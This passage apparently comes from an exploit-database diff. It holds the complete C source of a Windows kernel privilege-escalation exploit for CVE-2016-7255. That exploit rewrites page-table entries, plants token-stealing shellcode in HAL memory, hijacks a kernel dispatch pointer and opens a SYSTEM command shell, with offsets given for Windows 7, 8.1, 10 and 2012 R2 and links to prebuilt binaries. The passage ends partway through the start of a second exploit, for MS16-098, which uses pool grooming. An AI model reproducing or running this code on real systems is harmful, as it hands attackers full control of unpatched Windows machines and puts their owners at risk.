 Binary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe
 Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41015.exe
 */
 // ricklarabee.blogspot.com
 //This program is free software; you can redistribute it and/or
 //modify it under the terms of the GNU General Public License
 //as published by the Free Software Foundation.
 //This program is distributed in the hope that it will be useful,
 //but WITHOUT ANY WARRANTY; without even the implied warranty of
 //MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
 //GNU General Public License for more details.
 //You should have received a copy of the GNU General Public License
 //along with this program; if not, write to the Free Software
 //Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
 // Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255
 // PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255
 #include <windows.h>
 #include <wchar.h>
 #include <stdlib.h>
 #include <stdio.h>
 #pragma comment(lib,"ntdll.lib")
 #pragma comment(lib,"user32.lib")
 #pragma comment(lib, "advapi32")
 UINT64 PML4_BASE;
 UINT PML4_SELF_REF_INDEX;
 UINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;
 #define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
 #define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)
 #define GET_INDEX(va)  ( ((va >> 39) & 0x1ff )) 
 ////////////////////////////////////////////////////////
 // Define Data Types
 ////////////////////////////////////////////////////////
 typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
    PVOID  Unknown1;
    PVOID  Unknown2;
    PVOID  Base;
    ULONG  Size;
    ULONG  Flags;
    USHORT Index;
    USHORT NameLength;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR   ImageName[256];
 } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
 typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG   Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
 } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
 typedef enum _SYSTEM_INFORMATION_CLASS { 
    SystemModuleInformation = 11,
    SystemHandleInformation = 16
 } SYSTEM_INFORMATION_CLASS;
 typedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
                                                        OUT PVOID                   SystemInformation,
                                                        IN ULONG                    SystemInformationLength,
                                                        OUT PULONG ReturnLength);
 typedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG   ProfileSource,
 													OUT PULONG Interval);
 NtQuerySystemInformation_t NtQuerySystemInformation;
 NtQueryIntervalProfile_t NtQueryIntervalProfile;
 char shellcode[] = {
 	//0xcc,
 	0xfa, 															// CLI
 	0x9c, 															// PUSHFQ
 	0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90,  	// MOV RAX, Original Pointer
 	0x50, 															// PUSH RAX
 	0x51, 															// PUSH RCX
 	0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90,  	// MOV RCX, [OverwriteAddr+OverwriteOffset]
 	0x48, 0x89, 0x01,  												// MOV    QWORD PTR [RCX], RAX
 	0xb9, 0x90, 0x90, 0x90, 0x90,  									// MOV ECX, PID
 	0x53, 															// PUSH RBX
 	0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,  			// MOV    RAX,QWORD PTR gs:0x188
 	0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,						// MOV    RAX,QWORD PTR [RAX+0xb8] EPROCESS
 	0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00,						// LEA    RAX,[RAX+0xActiveProcessLinkOffset] 
 	//<tag>
 	0x48, 0x8b, 0x00,												// MOV    RAX,QWORD PTR [RAX]
 	0x48, 0x8b, 0x58, 0xf8,											// MOV    RBX,QWORD PTR [RAX-0x8] // UniqueProcessID
 	0x48, 0x83, 0xfb, 0x04,											// CMP    RBX,0x4
 	0x75, 0xf3,														// JNE    <tag>
 	0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90,						// MOV    RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM
 	0x53, 															// PUSH RBX
 	//<tag2>
 	0x48, 0x8b, 0x00,												// MOV    RAX,QWORD PTR [RAX]
 	0x48, 0x8b, 0x58, 0xf8,											// MOV    RBX,QWORD PTR [RAX-0x8] // UniqueProcessID
 	0x39, 0xcb,														// CMP    EBX, ECX // our PID
 	0x75, 0xf5,														// JNE    <tag2>
 	0x5b, 															// POP RBX
 	0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90,						// MOV    QWORD PTR[RAX + 0x60], RBX
 	0x5b, // POP RBX
 	0x59, // POP RCX
 	0x58, // POP RAX
 	0x9d, // POPFQ
 	0xfb, // STI
 	0xff, 0xe0 // JMP RAX
 };
 ULONG __cdecl DbgPrint(__in char* Format, ...)
 {
 	CHAR* pszDbgBuff = NULL;
 	va_list VaList = NULL;
 	ULONG ulRet = 0;
 	do
 	{
 		pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));
 		if (NULL == pszDbgBuff)
 		{
 			break;
 		}
 		RtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));
 		va_start(VaList, Format);
 		_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);
 		OutputDebugStringA(pszDbgBuff);
 		va_end(VaList);
 	} while (FALSE);
 	if (NULL != pszDbgBuff)
 	{
 		HeapFree(GetProcessHeap(), 0, pszDbgBuff);
 		pszDbgBuff = NULL;
 	}
 	return ulRet;
 }
 int _sim_key_down(WORD wKey)
 {
 	INPUT stInput = { 0 };
 	do
 	{
 		stInput.type = INPUT_KEYBOARD;
 		stInput.ki.wVk = wKey;
 		stInput.ki.dwFlags = 0;
 		SendInput(1, &stInput, sizeof(stInput));
 	} while (FALSE);
 	return 0;
 }
 int _sim_key_up(WORD wKey)
 {
 	INPUT stInput = { 0 };
 	do
 	{
 		stInput.type = INPUT_KEYBOARD;
 		stInput.ki.wVk = wKey;
 		stInput.ki.dwFlags = KEYEVENTF_KEYUP;
 		SendInput(1, &stInput, sizeof(stInput));
 	} while (FALSE);
 	return 0;
 }
 int _sim_alt_shift_esc()
 {
 	int i = 0;
 	do
 	{
 		_sim_key_down(VK_MENU);
 		_sim_key_down(VK_SHIFT);
 		_sim_key_down(VK_ESCAPE);
 		_sim_key_up(VK_ESCAPE);
 		_sim_key_down(VK_ESCAPE);
 		_sim_key_up(VK_ESCAPE);
 		_sim_key_up(VK_MENU);
 		_sim_key_up(VK_SHIFT);
 	} while (FALSE);
 	return 0;
 }
 int _sim_alt_shift_tab(int nCount)
 {
 	int i = 0;
 	HWND hWnd = NULL;
 	int nFinalRet = -1;
 	do
 	{
 		_sim_key_down(VK_MENU);
 		_sim_key_down(VK_SHIFT);
 		for (i = 0; i < nCount; i++)
 		{
 			_sim_key_down(VK_TAB);
 			_sim_key_up(VK_TAB);
 			Sleep(1000);
 		}
 		_sim_key_up(VK_MENU);
 		_sim_key_up(VK_SHIFT);
 	} while (FALSE);
 	return nFinalRet;
 }
 int _sim_alt_esc(int count)
 {
 	int i = 0;
 	for (i = 0; i<count; i++)
 	{
 		_sim_key_down(VK_MENU);
 		//_sim_key_down(VK_SHIFT);
 		_sim_key_down(VK_ESCAPE);
 		_sim_key_up(VK_ESCAPE);
 		_sim_key_down(VK_ESCAPE);
 		_sim_key_up(VK_ESCAPE);
 		_sim_key_up(VK_MENU);
 		//_sim_key_up(VK_SHIFT);
 	}
 	return 0;
 }
 int or_address_value_4(__in void* pAddress)
 {
 	WNDCLASSEXW stWC = { 0 };
 	HWND    hWndParent = NULL;
 	HWND    hWndChild = NULL;
 	WCHAR*  pszClassName = L"cve-2016-7255";
 	WCHAR*  pszTitleName = L"cve-2016-7255";
 	void*   pId = NULL;
 	MSG     stMsg = { 0 };
 	UINT64 value = 0;
 	do
 	{
 		stWC.cbSize = sizeof(stWC);
 		stWC.lpfnWndProc = DefWindowProcW;
 		stWC.lpszClassName = pszClassName;
 		if (0 == RegisterClassExW(&stWC))
 		{
 			break;
 		}
 		hWndParent = CreateWindowExW(
 			0,
 			pszClassName,
 			NULL,
 			WS_OVERLAPPEDWINDOW | WS_VISIBLE,
 			0,
 			0,
 			360,
 			360,
 			NULL,
 			NULL,
 			GetModuleHandleW(NULL),
 			NULL
 		);
 		if (NULL == hWndParent)
 		{
 			break;
 		}
 		hWndChild = CreateWindowExW(
 			0,
 			pszClassName,
 			pszTitleName,
 			WS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,
 			0,
 			0,
 			160,
 			160,
 			hWndParent,
 			NULL,
 			GetModuleHandleW(NULL),
 			NULL
 		);
 		if (NULL == hWndChild)
 		{
 			break;
 		}
 #ifdef _WIN64
 		pId = ((UCHAR*)pAddress - 0x28);
 #else
 		pId = ((UCHAR*)pAddress - 0x14);
 #endif // #ifdef _WIN64
 		SetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);
 		DbgPrint("hWndChild = 0x%p\n", hWndChild);
 		ShowWindow(hWndParent, SW_SHOWNORMAL);
 		SetParent(hWndChild, GetDesktopWindow());
 		SetForegroundWindow(hWndChild);
 		_sim_alt_shift_tab(4);
 		SwitchToThisWindow(hWndChild, TRUE);
 		_sim_alt_shift_esc();
 		while (GetMessage(&stMsg, NULL, 0, 0)) {
 			SetFocus(hWndParent);
 			_sim_alt_esc(20);
 			SetFocus(hWndChild);
 			_sim_alt_esc(20);
 			TranslateMessage(&stMsg);
 			DispatchMessage(&stMsg);
 			if (value != 0) {
 				break;
 			}
 			__try {
 				value = *(UINT64 *)PML4_SELF_REF;
 				if ((value & 0x67) == 0x67) {
 					printf("Value Self Ref = %llx\n", value);
 					break;
 				}
 			}
 			__except (EXCEPTION_EXECUTE_HANDLER) {
 				continue;
 			}
 		}
 	} while (FALSE);
 	if (NULL != hWndParent)
 	{
 		DestroyWindow(hWndParent);
 		hWndParent = NULL;
 	}
 	if (NULL != hWndChild)
 	{
 		DestroyWindow(hWndChild);
 		hWndChild = NULL;
 	}
 	UnregisterClassW(pszClassName, GetModuleHandleW(NULL));
 	return 0;
 }
 UINT64 get_pxe_address(UINT64 address) {
 	UINT entry = PML4_SELF_REF_INDEX;
 	UINT64 result = address >> 9;
 	UINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);
 	UINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;
 	result = result | lower_boundary;
 	result = result & upper_boundary;
 	return result;
 }
 UINT64 look_free_entry_pml4(void) {
 	// Looks for a free pml4e in the last 0x100 bytes of the PML4
 	int offset = 0xF00;
 	UINT64 pml4_search = PML4_BASE + offset;
 	while (offset < 0xFF8)
 	{
 		if ((*(PVOID *)pml4_search) == 0x0)
 		{
 			// This is a NULL (free) entry
 			break;
 		}
 		offset += 8;
 		pml4_search = PML4_BASE + offset;
 	}
 	return pml4_search;
 }
 UINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {
 	UINT64 index = (spurious_offset & 0xFFF) / 8;
 	UINT64 result = (
 		((UINT64)0xFFFF << 48) |
 		((UINT64)PML4_SELF_REF_INDEX << 39) |
 		((UINT64)PML4_SELF_REF_INDEX << 30) |
 		((UINT64)PML4_SELF_REF_INDEX << 21) |
 		(index << 12)
 		);
 	return result;
 }
 UINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {
 	/*
 	1: kd> !pte ffffffff`ffd00000
 	VA ffffffffffd00000
 	PXE at FFFFF6FB7DBEDFF8    PPE at FFFFF6FB7DBFFFF8    PDE at FFFFF6FB7FFFFFF0    PTE at FFFFF6FFFFFFE800
 	contains 0000000000A1F063  contains 0000000000A20063  contains 0000000000A25063  contains 8000000000103963
 	pfn a1f-- - DA--KWEV  pfn a20-- - DA--KWEV  pfn a25-- - DA--KWEV  pfn 103 - G - DA--KW - V
 	*/	
 	UINT64 pte = get_pxe_address(virtual_address);
 	int pte_offset = pte & 0xFFF;
 	//printf("PTE: %llx, %x\n", pte, pte_offset);
 	UINT64 pde = get_pxe_address(pte);
 	int pde_offset = pde & 0xFFF;
 	//printf("PDE: %llx, %x\n", pde, pde_offset);
 	UINT64 pdpte = get_pxe_address(pde);
 	int pdpte_offset = pdpte & 0xFFF;
 	//printf("PDPTE: %llx,%x\n", pdpte, pdpte_offset);
 	UINT64 pml4e = get_pxe_address(pdpte);
 	int pml4e_offset = pml4e & 0xFFF;
 	//printf("PML4E: %llx\n", pml4e, pml4e_offset);
 	UINT64 spurious_offset = look_free_entry_pml4();
 	printf("[+] Selected spurious PML4E: %llx\n", spurious_offset);
 	UINT64 f_e_pml4 = spurious_offset;
 	UINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);
 	printf("[+] Spurious PT: %llx\n", spurious_pt);
 	printf("--------------------------------------------------\n\n");
 	//Read the physical address of pml4e	
 	UINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);
 	printf("[+] Content pml4e %llx: %llx\n", pml4e, pml4e_pfn);
 	// Change the PxE
 	pml4e_pfn = pml4e_pfn | 0x67; // Set U/S
 	printf("[+] Patching the Spurious Offset (PML4e) %llx: %llx\n",f_e_pml4, pml4e_pfn);
 	*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;
 	Sleep(0x1); // Sleep for TLB refresh;
 	//Read the physical address of pdpte
 	UINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);
 	printf("[+] Content pdpte %llx: %llx\n", pdpte, pdpte_pfn);
 	// Change the PxE
 	pdpte_pfn = pdpte_pfn | 0x67; // Set U/S
 	printf("[+] Patching the Spurious Offset (PDPTE) %llx: %llx\n", spurious_offset, pdpte_pfn);
 	*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;
 	Sleep(0x1); // Sleep for TLB refresh;
 	//Read the physical address of pde
 	UINT64 pde_addr = spurious_pt + pde_offset;
 	UINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);
 	printf("[+] Content pdpe %llx: %llx\n", pde, pde_pfn);
 	// Change the PxE
 	pde_pfn = pde_pfn | 0x67; // Set U/S
 	printf("[+] Patching the Spurious Offset (PDE) %llx: %llx\n", spurious_offset, pde_pfn);
 	*((PVOID *)spurious_offset) = (PVOID)pde_pfn;
 	Sleep(0x1); // Sleep for TLB refresh;
 	//Read the physical address of pte
 	UINT64 pte_addr = spurious_pt + pte_offset;
 	UINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);
 	printf("[+] Content pte %llx: %llx\n", pte, pte_pfn);
 	// Change the PxE
 	pte_pfn = pte_pfn | 0x67; // Set U/S
    pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX   
 	if (patch_original) {
 		printf("*** Patching the original location to enable NX...\n");
 		*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;
 	}
 	printf("[+] Patching the Spurious Offset (PTE) %llx: %llx\n", spurious_offset, pte_pfn);
 	*((PVOID *)spurious_offset) = (PVOID)pte_pfn;
 	Sleep(0x1); // Sleep for TLB refresh;
 	printf("\n\n");
 	return spurious_pt;
 }
 UINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {
 	printf("[*] Getting Overwrite pointer: %llx\n", target_address);
 	UINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);
 	OverwriteAddress += (target_address & 0xFFF);
 	printf("OverwriteAddress: %llx\n", OverwriteAddress);
 	return (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));
 }
 void overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {
 	UINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);
 	OverwriteTarget += (target_address & 0xFFF);
 	UINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;
 	printf("Patch OverwriteTarget: %llx with %llx\n", target, hook_address);
 	*(PVOID *)target = (PVOID)hook_address;
 }
 UINT64 store_shellcode_in_hal(void) {
 	//// Finally store the shellcode on the HAL
 	UINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;
 	UINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);
 	printf("HAL address: %llx\n", hal_heap);
 	// 0xffffffffffd00d50 this is a good offset to store shellcode 
 	// 0xfff - 0xd50 = 0x2af space
 	memcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));
 	return 0xffffffffffd00d50;
 }
 UINT64 GetHalDispatchTable() {
    PCHAR KernelImage;
    SIZE_T ReturnLength;
    HMODULE hNtDll = NULL;
    UINT64 HalDispatchTable;
    HMODULE hKernelInUserMode = NULL;
    PVOID KernelBaseAddressInKernelMode;
    NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;
    PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;
    hNtDll = LoadLibrary("ntdll.dll");
    if (!hNtDll) {
        printf("\t\t\t[-] Failed To Load NtDll.dll: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }
    NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, "NtQuerySystemInformation");
    if (!NtQuerySystemInformation) {
        printf("\t\t\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }
    NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);
    // Allocate the Heap chunk
    pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),
                                                                     HEAP_ZERO_MEMORY,
                                                                     ReturnLength);
    if (!pSystemModuleInformation) {
        printf("\t\t\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }
    NtStatus = NtQuerySystemInformation(SystemModuleInformation,
                                        pSystemModuleInformation,
                                        ReturnLength,
                                        &ReturnLength);
    if (NtStatus != STATUS_SUCCESS) {
        printf("\t\t\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }
    KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;
    KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\') + 1;
    printf("\t\t\t[+] Loaded Kernel: %s\n", KernelImage);
    printf("\t\t\t[+] Kernel Base Address: 0x%p\n", KernelBaseAddressInKernelMode);
    hKernelInUserMode = LoadLibraryA(KernelImage);
    if (!hKernelInUserMode) {
        printf("\t\t\t[-] Failed To Load Kernel: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }
    // This is still in user mode
    HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, "HalDispatchTable");
    if (!HalDispatchTable) {
        printf("\t\t\t[-] Failed Resolving HalDispatchTable: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }
    else {
        HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;
        // Here we get the address of HapDispatchTable in Kernel mode
        HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);
        printf("\t\t\t[+] HalDispatchTable: 0x%llx\n", HalDispatchTable);
    }
    HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);
    if (hNtDll) {
        FreeLibrary(hNtDll);
    }
    if (hKernelInUserMode) {
        FreeLibrary(hKernelInUserMode);
    }
    hNtDll = NULL;
    hKernelInUserMode = NULL;
    pSystemModuleInformation = NULL;
    return HalDispatchTable;
 }
 int __cdecl main(int argc, char** argv)
 {
 	TCHAR pre_username[256];
 	TCHAR post_username[256];
 	DWORD size = 256;
 	ULONG Interval = 0;
 	HMODULE hNtDll = NULL;
 	UINT retval;
    UINT64 overwrite_address;
    int overwrite_offset;
    // define operating system version specific variables
    unsigned char sc_KPROCESS;
    unsigned int sc_TOKEN;
    unsigned int sc_APLINKS;
 	int osversion;
 	if (argc != 2) {
 		printf("Please enter an OS version\n");
 		printf("The following OS'es are supported:\n");
 		printf("\t[*] 7  - Windows 7\n");
 		printf("\t[*] 81 - Windows 8.1\n");
 		printf("\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\n");
 		printf("\t[*] 12 - Windows 2012 R2\n");
 		printf("\n");
 		printf("\t[*] For example:  cve-2016-7255.exe 7    -- for Windows 7\n");
 		return -1;
 	}
 	osversion = _strtoui64(argv[1], NULL, 10);
    if(osversion == 7) 
    {
        // the target machine's OS is Windows 7 SP1
        printf("   [+] Windows 7 SP1\n");
        sc_KPROCESS = 0x70;			// dt -r1 nt!_KTHREAD  +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
        sc_TOKEN    = 0x80;			// dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)
        sc_APLINKS  = 0x188;		// dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY
        overwrite_address = GetHalDispatchTable();  // HalDispatchTable
        overwrite_offset = 0x8;      				// QueryIntervalProfile        
    }
 	else if(osversion == 81)
    {
        // the target machine's OS is Windows 8.1
        printf("   [+] Windows 8.1\n");
        sc_KPROCESS = 0xB8;             // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
        sc_TOKEN    = 0x60;             // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)
        sc_APLINKS  = 0x2e8;         	// dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY
        overwrite_address = 0xffffffffffd00510;     // HalpInterruptController_address (dq poi(hal!HalpInterruptController))
        overwrite_offset = 0x78;                    // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)
    }
 	else if(osversion == 10)
    {
        // the target machine's OS is Windows 10 prior to build 14393
        printf("   [+] Windows 10\n");
        sc_KPROCESS = 0xB8;             // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
        sc_TOKEN    = 0x68;             // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)
        sc_APLINKS  = 0x2f0;            // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY
        overwrite_address = 0xffffffffffd004c0;     // HalpInterruptController_address (dq poi(hal!HalpInterruptController)
        overwrite_offset = 0x78;                    // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)
    }
 	else if(osversion == 12)
    {
        // the target machine's OS is Windows 2012 R2
        printf("   [+] Windows 2012 R2\n");
        sc_KPROCESS = 0xB8;             // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
        sc_TOKEN    = 0x60;             // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)
        sc_APLINKS  = 0x2e8;            // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY
        overwrite_address = 0xffffffffffd12c70;     // HalpInterruptController_address (dq poi(hal!HalpInterruptController)
        overwrite_offset = 0x78;                    // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)
    }
    // in case the OS version is not any of the previously checked versions
    else
    {
        printf("   [-] Unsupported version\n");
        printf("      [*] Affected 64-bit operating systems\n");
        printf("         [*] Windows 7 SP1                 -- cve-2016-7255.exe 7\n");
 		printf("         [*] Windows 8.1                   -- cve-2016-7255.exe 81\n");
 		printf("         [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\n");
 		printf("		 [*] Windows 2012 R2			   -- cve-2016-7255.exe 12\n");
        return -1;
    }
 	printf("My PID is: %d\n", GetCurrentProcessId());
    GetUserName(pre_username, &size);
 	printf("Current Username: %s\n", pre_username);
 	printf("PML4 Self Ref: %llx\n", PML4_SELF_REF);
    printf("Shellcode stored at: %p\n", (void *) &shellcode);
 	printf("Enter to continue...\n");
 	getchar();
 	do
 	{
 		or_address_value_4((void*)PML4_SELF_REF);
 	} while (FALSE);
 	PML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);
 	printf("[*] Self Ref Index: %x\n", PML4_SELF_REF_INDEX);
 	PML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);
    UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);
 	printf("Original OverwriteTarget pointer: %llx\n", original_pointer);
 	DWORD pid = GetCurrentProcessId();
    /* Shellcode Patching !! */
 	char *p = shellcode;
 	p += 4; // skip the CLI, PUSHF and MOV RAX bytes	
 	*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1
 	p += 12; // Patch shellcode with original value in the Overwrite address
 	*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);
 	p += 12; // To patch the PID of our process
 	*(DWORD *)p = (DWORD)pid;
    p += 17;
    *(unsigned char *)p = (unsigned char)sc_KPROCESS;
    p += 7;
    *(unsigned int *)p = (unsigned int)sc_APLINKS;
    p += 20;
    *(unsigned int *)p = (unsigned int)sc_TOKEN;
    p += 20;
    *(unsigned int *)p = (unsigned int)sc_TOKEN;
    UINT64 shellcode_va = store_shellcode_in_hal();
 	printf("[+] w00t: Shellcode stored at: %llx\n", shellcode_va);
 	overwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);
 	if (osversion == 7){
 		// Exploit Win7.1
 		hNtDll = LoadLibrary("ntdll.dll");
 		if (!hNtDll) {
 			printf("\t\t[-] Failed loading NtDll: 0x%X\n", GetLastError());
 			exit(EXIT_FAILURE);
 		}
 		NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, "NtQueryIntervalProfile");
 		if (!NtQueryIntervalProfile) {
 			printf("\t\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\n", GetLastError());
 			exit(EXIT_FAILURE);
 		}	
 		NtQueryIntervalProfile(0x1337, &Interval);
 	}
 	while (1) {
 		size = 256;
 		GetUserName(post_username, &size);
 		if (memcmp(post_username, pre_username, 256) != 0) break;
 	}
 	Sleep(2000);
 	system("cmd.exe");
 	return 0;
 }
--- a/platforms/windows/local/41020.c
+++ b/platforms/windows/local/41020.c
@ -0,0 +1,309 @@
 // Source: https://github.com/sensepost/ms16-098/tree/b85b8dfdd20a50fc7bc6c40337b8de99d6c4db80
 // Binary: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41020.exe
 #include <Windows.h>
 #include <wingdi.h>
 #include <stdio.h>
 #include <winddi.h>
 #include <time.h>
 #include <stdlib.h>
 #include <Psapi.h>
 HANDLE hWorker, hManager;
 BYTE *bits;
 //dt nt!_EPROCESS UniqueProcessID ActiveProcessLinks Token
 typedef struct
 {
 	DWORD UniqueProcessIdOffset;
 	DWORD TokenOffset;
 } VersionSpecificConfig;
 VersionSpecificConfig gConfig = { 0x2e0, 0x348 }; //win 8.1
 void AllocateClipBoard2(unsigned int size) {
 	BYTE *buffer;
 	buffer = malloc(size);
 	memset(buffer, 0x41, size);
 	buffer[size - 1] = 0x00;
 	const size_t len = size;
 	HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, len);
 	memcpy(GlobalLock(hMem), buffer, len);
 	GlobalUnlock(hMem);
 	//OpenClipboard(0);
 	//EmptyClipboard();
 	SetClipboardData(CF_TEXT, hMem);
 	//CloseClipboard();
 	//GlobalFree(hMem);
 }
 static HBITMAP bitmaps[5000];
 void fungshuei() {
 	HBITMAP bmp;
 	// Allocating 5000 Bitmaps of size 0xf80 leaving 0x80 space at end of page.
 	for (int k = 0; k < 5000; k++) {
 		//bmp = CreateBitmap(1685, 2, 1, 8, NULL); //800 = 0x8b0 820 = 0x8e0 1730 = 0x1000 1700 = 0xfc0 1670 = 0xf70
 		bmp = CreateBitmap(1670, 2, 1, 8, NULL);										 // 1680  = 0xf80 1685 = 0xf90 allocation size 0xfa0
 		bitmaps[k] = bmp;
 	}
 	HACCEL hAccel, hAccel2;
 	LPACCEL lpAccel;
 	// Initial setup for pool fengshui.  
 	lpAccel = (LPACCEL)malloc(sizeof(ACCEL));
 	SecureZeroMemory(lpAccel, sizeof(ACCEL));
 	// Allocating  7000 accelerator tables of size 0x40 0x40 *2 = 0x80 filling in the space at end of page.
 	HACCEL *pAccels = (HACCEL *)malloc(sizeof(HACCEL) * 7000);
 	HACCEL *pAccels2 = (HACCEL *)malloc(sizeof(HACCEL) * 7000);
 	for (INT i = 0; i < 7000; i++) {
 		hAccel = CreateAcceleratorTableA(lpAccel, 1);
 		hAccel2 = CreateAcceleratorTableW(lpAccel, 1);
 		pAccels[i] = hAccel;
 		pAccels2[i] = hAccel2;
 	}
 	// Delete the allocated bitmaps to free space at beiginig of pages
 	for (int k = 0; k < 5000; k++) {
 		DeleteObject(bitmaps[k]);
 	}
 	//allocate Gh04 5000 region objects of size 0xbc0 which will reuse the free-ed bitmaps memory.
 	for (int k = 0; k < 5000; k++) {
